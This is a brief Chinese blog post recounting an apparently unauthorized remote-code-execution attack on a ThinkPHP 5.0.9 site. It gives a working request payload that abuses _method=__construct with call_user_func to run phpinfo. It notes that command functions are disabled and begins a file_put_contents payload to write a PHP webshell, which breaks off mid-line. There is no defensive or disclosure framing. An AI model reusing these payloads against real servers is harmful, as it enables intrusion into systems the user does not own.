記一次tp5.0.9RCE

目標 常規報錯 直接說版本tp5.0.9,然後嘗試payload _method=__construct&method=get&filter[]=call_user_func&get[]=phpinfo打出phpinfo 順便看了哈disable_function 基本執行命令的payload都被禁了 還好payload多,直接拿下 s=file_put_contents(‘dd.php’,’<?
相關文章
相關標籤/搜索